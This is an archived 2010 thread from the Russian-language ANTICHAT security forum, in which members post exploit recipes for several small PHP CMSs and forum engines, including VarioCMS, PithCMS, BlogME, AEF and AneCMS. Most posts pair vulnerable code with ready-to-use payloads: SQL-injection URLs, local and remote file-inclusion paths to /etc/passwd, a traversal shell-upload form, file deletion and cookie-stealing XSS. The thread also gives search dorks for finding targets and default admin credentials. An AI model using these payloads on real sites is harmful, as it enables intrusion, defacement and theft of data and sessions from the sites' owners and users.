ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

27.03.2010, 21:42
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Product: VarioCMS
Version: 0.5.6
Author:: http://sourceforge.net/projects/variocms/
SQL-Inj
Need: mq=off;
File: /plugins/system/slideshow/upload.php
PHP код:
if (isset($_GET['album_id'])) {
$album_id = $_GET['album_id'];
}
....
$sql_insert = "INSERT INTO " . $db_plugin_prefix . "slideshow (album, albumid, image, thumbnail, position) VALUES ('$album', '$album_id', '$image', '0', '$position')";
fputs($logfile, "$sql_insert\n");
Target: http://localhost/bugs/VarioCMS/plugins/system/slideshow/upload.php?album=1&album_id=1'{SQL}.
Columns: 7
Upload Shell
Need: none.
File: /plugins/system/slideshow/upload.php
PHP код:
if (isset($_GET['album_id'])) {
$album_id = $_GET['album_id'];
}
..
foreach ($_FILES as $file => $fileArray) {
echo("File key: $file\n");
foreach ($fileArray as $item=>$val) {
}
//Let's manipulate the received file: in this demo, we just want to remove it!
$new_dir = $slideshow_path . $album_id;
if (file_exists($new_dir) == false) {
mkdir ($new_dir);
mkdir ($new_dir . "/fullsize");
mkdir ($new_dir . "/slideshow");
mkdir ($new_dir . "/thumbnails");
}
$upload_dir = $slideshow_path . $album_id . "/";
$position = 65000;
if (move_uploaded_file($fileArray['tmp_name'], $upload_dir . uml2nouml($fileArray['name']))) {
Target:
Expl0it ^_^:
Код:
<form enctype="multipart/form-data" action="http://targethost.com/plugins/system/slideshow/upload.php?album=1" method="get" >
<input type="file" name="Filedata" /><input type="submit" />
<input type="text" name="album_id" value="../../"/>
</form>
album_id = folder to upload shell.
|
|
|

28.03.2010, 14:59
|
|
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме: 6462214
Репутация:
3171
|
|
Product: PithCMS
Version: 0.9.5
Author: http://sourceforge.net/projects/pithcms/
Local File Inclusion
File: newsreader.php
Need: rg=on;
PHP код:
include ("admin/lang/$lang");
include ("_read_config.inc.php");
include_once ("inc/cleaner.inc.php");
Target: http://targethost.com/newsreader.php?lang=../../../../../../etc/passwd
File: admin/blog.php
Need:logged on target site!
PHP код:
session_start();
if (!isset($_SESSION['user'])) {
echo "<h2>ACCESS DENIED AND LOGGED</h2>";
exit;
}
...
f (isset($_POST['filename'])) {
//include ("$rootdir/articles/".$_POST['filename']);
include ("../news/".$_POST['filename']);
}else{
...
Target: {POST} http://targethost.com/admin/blog.php?filename=../../../../../../../../../etc/passwd
Remove arbitrary file
File: admin/download_remove.php
Need: logged on target site!
PHP код:
if (isset($_POST['file']) && ($_POST['file'] != "lista.php") && ($_POST['file'] != "index.php") && ($_POST['file'] != "")) {
$file = trim($_POST['file']);
$object = ("../downloads/$file");
Target: {POST} http://targethost.com/admin/download_remove.php?file=../indeX.php
|
|
|

01.04.2010, 10:42
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме: 5011696
Репутация:
2221
|
|
MusicBox v3.3
SQL Injection:
/blogs.php?action=edit&newsid=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion())+--+
/genre_artists.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7+--+
Пассивная XSS:
/index.php?in=artist&term=%22%3E%3Csсriрt%3Ealert (document.cookie);%3C/sсriрt%3EE&action=search&start=0&x=0&y=0
/index.php?action=top&show=5&type=Artists+order+by+ 1+--+%22%3E%3Csсriрt%3Ealert(document.cookie);%3C/sсriрt%3E
Активная XSS:
/member.php?uname=кому будем посылать XSS, в комменты <sсriрt>alert(document.cookie);</sсriрt>
По идеи почти каждый параметр уязвим.
/phpinfo.php 
|
|
|

07.04.2010, 15:15
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
BlogME
Product : BlogME 1.1
SQL injection
file : index.php
mq = off
Код:
http://x60unu/index.php?month=4&year=2007'+and+0+union+all+select+version(),version(),3,4,5,6,7,8--+
Код:
http://x60unu/index.php?cat=General'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
Код:
http://x60unu/index.php?when=March%206,%202007'+and+0+union+all+select+1,2,3,4,5,6,7,8--+
SQL in Admin Panel
file : blogroll.php
PHP код:
case 'edit' :
$sqledit= "SELECT * FROM ". $prefix ."_blogroll WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Код:
http://x60unu/blogroll.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete= "DELETE FROM ". $prefix ."_blogroll where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
result :
Код:
http://x60unu/blogroll.php?mode=delete&id=1[blind sql]
file : category.php
PHP код:
$sqledit= "SELECT * FROM ". $prefix ."_cat WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result:
Код:
http://x60unu/category.php?mode=edit&id=1+and+0+union+all+select+1,2--+
blind sql
PHP код:
sqldelete= "DELETE FROM ". $prefix ."_cat where id=$id";
$resultdelete = db_query($dbname,$sqldelete)
result :
Код:
http://x60unu/category.php?mode=delete&id=1[blind sql]
file : links.php
PHP код:
$sqledit= "SELECT * FROM ". $prefix ."_links WHERE id=$id";
$resultedit = db_query($dbname,$sqledit);
$editvalues = mysql_fetch_array($resultedit);
result :
Код:
http://x60unu/links.php?mode=edit&id=1+and+0+union+all+select+1,2,3--+
blind sql
PHP код:
$sqldelete= "DELETE FROM ". $prefix ."_links where id=$id";
$resultdelete = db_query($dbname,$sqldelete);
Код:
http://x60unu/links.php?mode=delete&id=1[blind sql]
Active Xss
comments --- text comments --- "><script>alert();</script>
з.ы. двиг сплошная дыра 
|
|
|

08.04.2010, 13:42
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Продукт:: AEF (форумный движок)
Сайт:: http://www.anelectron.com
Дорк:: "Powered by AEF" (250 000 результатов)
Уязвимость:: Активная XSS.
Уязвимость присутствует из-за небезопасной обработки BB-тегов.
Можно вызвать разрушение тегов, и, как следствие, выполнение javascript-кода.
Пример эксплуатации:
Код:
[*url]http://asd.asd[*email]asd@asd.asd onmouseover=alert() bla=[*/email][*/url]
На выходе получаем:
Код:
<a href="http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a>" target="_blank">http://asd.asd<a href="mailto:asd@asd.asd onmouseover=alert() bla=" target="_blank">asd@asd.asd onmouseover=alert() bla=</a></a>
Можно также провести атаку через стили (для ie и ff), тогда можно спрятать куски разрушенного тега:
Код:
[*url]http://asd.asd[*email]asd@asd.asd style=display:none;olo:expression(alert());-moz-binding:url() bla=[*/email][*/url]
Последний раз редактировалось Root-access; 08.04.2010 в 13:47..
|
|
|

08.04.2010, 14:28
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Продукт:: Beehive (форумный движок)
Сайт:: http://beehiveforum.sourceforge.net/
Дорк:: "Project Beehive Forum" (?)
Уязвимость:: Активная XSS.
Уязвимость существует из-за недостаточной фильтрации слова javascript в сообщении.
Строчка из /include/fixhtml.php (скрипт "безопасной" обработки html):
PHP код:
$attrib_value = preg_replace("/javascript:/ixu", '', $attrib_value);
В движке разрешён html, а это ограничение обходится простым кодированием html (протокол от этого валидность не теряет):
Код:
<img src="javascript:alert()" />
|
|
|

08.04.2010, 15:16
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме: 2223440
Репутация:
648
|
|
Продукт:: CompactCMS
Сайт:: http://www.compactcms.nl
Дорк:: "Maintained with CompactCMS"
//тут была глупая ошибка, Strilo4ka заметил...
Уязвимость:: Исполнение произвольного кода.
Требования: права админа (админка по умолчанию не запаролена - /admin)
Жмём Create a new page, создаём страничку с php-кодом, затем она инклудится, и мы имеем шелл.
Последний раз редактировалось Root-access; 09.04.2010 в 11:50..
|
|
|

08.04.2010, 23:01
|
|
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме: 3202832
Репутация:
1588
|
|
AneCMS
Product : Demo AneCMS v1
Blind SQL injection
Код:
http://demo.anecms.com/blog/delete/1/1/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/
Active XSS
comments blog news - "><script>alert();</script>
Код:
http://anecms.com/blog/5/Template_Engine_and_cleaning_time
LFI
rss.php
PHP код:
if(isset($_GET['module']))
include './modules/'.$_GET['module'].'/rss.php';
Код:
http://x60unu/rss.php?module=../[file]%00
Admin panel
PHP код:
include './pages/'.$_GET['p'].'.php';
Код:
http://demo.anecms.com/acp/?p=lfi
Код:
http://x60unu/acp/index.php?p=../../[file]%00
Путь
Код:
http://demo.anecms.com/register/next
Дыр тут много 
Последний раз редактировалось [x60]unu; 08.04.2010 в 23:19..
|
|
|

09.04.2010, 07:00
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
phpwcms v1.4.5
release 2010
Скачано отсюдо!
XSS + HPP
/image_zoom.php
Код:
..if(empty($_GET["show"])) {
$width_height = '';
$img = "img/leer.gif";
} else {
$img = base64_decode($_GET["show"]);
list($img, $width_height) = explode('?', $img);
$img = str_replace(array('http://', 'https://', 'ftp://'), '', $img);
$img = strip_tags($img);
$width_height = strip_tags($width_height);
$img = PHPWCMS_IMAGES.urlencode($img);...
Код:
...<a href="#" title="Close PopUp" onclick="window.close();return false;"><img src="<?php echo $img ?>" alt="" border="0" <?php echo $width_height ?> /></a>...
Result:
1) формируем код, example: адрес_рисунка?onmouseover=alert(1)
2) переводим в base64 - MDRANUFfQDhBQz06MD9vbm1vdXNlb3Zlcj1hbGVydCgxKQ==
3) тулим эту строку гетом в show.
ps админка - /login.php
По умолчанию:
логин - admin;
пасс - phpwcms (md5).
Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:01..
|
|
|

10.04.2010, 22:26
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме: 3363660
Репутация:
1148
|
|
AneCMS
Продолжение поста [x60]unu.
RFI
ajax.php!
PHP код:
<?php
include './system/pages/essential.php';
if(isset($_POST['p']))
include $_POST['p'];
?>
Условие:
allow_url_include = On
Експлуатация:
Код HTML:
<form method="POST" action="http://localhost/anecms/ajax.php">
<input type="text" name="p" />
<input type="submit" /></form>
Последний раз редактировалось Strilo4ka; 15.04.2010 в 06:00..
|
|
|
|
 |
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|